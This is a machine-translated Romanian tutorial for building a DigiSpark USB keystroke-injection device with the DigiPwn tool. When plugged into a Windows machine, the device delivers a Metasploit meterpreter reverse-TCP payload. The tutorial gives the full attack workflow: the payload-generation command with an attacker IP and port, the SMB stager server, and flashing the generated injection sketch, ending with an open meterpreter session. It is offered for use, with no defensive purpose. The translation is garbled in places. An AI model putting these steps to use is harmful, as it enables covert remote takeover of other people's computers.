Cuprins:
2025 Autor: John Day | [email protected]. Modificat ultima dată: 2025-01-13 06:58
Deci, ce facem aici?
DigiSpark este un mic instrument de dezvoltare bazat pe Arduino, care poate acționa ca o intrare de tastatură HID. Astăzi manipulăm acest dispozitiv pentru a spori un sistem de operare Windows!
Provizii
IDE Arduino
O mașină cu ferestre
DigiSpark
Cadrul Metasploit
Python 2.7 (Notă: aveți nevoie de python „2.7” nu mergeți pentru nicio altă versiune)
impacket
Creier! Ajută
Pasul 1: Clonați depozitul DigiPwn
Clonați la repo GitHub a DigiPwn de
git clone
Acum schimbați directorul în DigiPwn prin
cd DigiPwn /
Pasul 2: Instalați Impacket [Module cerute de Python]
Acest modul este necesar pentru a rula serverul SMB, care este necesar pentru biblioteca de încărcare utilă
sudo apt-get install python-impacket
Sau puteți descărca biblioteca impacket și o puteți instala de aici.
Pasul 3: Să generăm sarcina utilă
Alerga
python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [format]
ex
python DigiPwn.py 192.168.1.2 8080 windows / meterpreter / reverse_tcp win.vbs win.vbs
Acum veți fi întrebat dacă porniți serverul stager și SMB. Apăsați y și apăsați Enter
Pasul 4: Încărcați acum codul pe Arduino
Înainte de a încărca, trebuie să ne asigurăm că placa DigiSpark este instalată în Arduino pentru a face acest lucru aici.
după aceea încărcați fișierul keystroke_inject.ino generat de script. După ce ați terminat, sunteți gata
Pasul 5: Este timpul să conectați copilul
Conectați-vă DigiSpark acum și așteptați 10 secunde
BOOM Există o sesiune de meterpreter deschisă!